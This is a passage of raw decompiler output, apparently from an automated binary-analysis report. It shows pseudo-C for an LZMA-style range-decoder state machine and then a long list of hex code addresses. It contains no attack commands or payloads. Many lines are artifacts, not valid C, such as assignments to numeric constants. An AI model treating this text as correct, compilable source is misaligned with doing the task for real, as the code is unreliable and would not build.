							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406c71
0x00406c71
0x00406c75
0x00406d2c
0x00406d2f
0x00406d3b
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00407007
0x00407007
0x0040700d
0x0040700d
0x00000000
0x00406fe2
0x00406fe2
0x00406fe6
0x00407195
0x00000000
0x00407195
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00000000
0x00407004
0x00406c7b
0x00406c7f
0x004071c0
0x004071c0
0x004071c3
0x004071c7
0x004071c7
0x00406c85
0x00406c8b
0x00406c8e
0x00406c92
0x00406c95
0x00406c99
0x0040715f
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x00000000
0x004071bc
0x00406c9f
0x00406ca2
0x00406ca8
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00406cd3
0x00406cd3
0x00406cd3
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00000000
0x004069b2
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00000000
0x00406cfd
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00000000
0x00406f8e
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x00000000
0x00407101
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
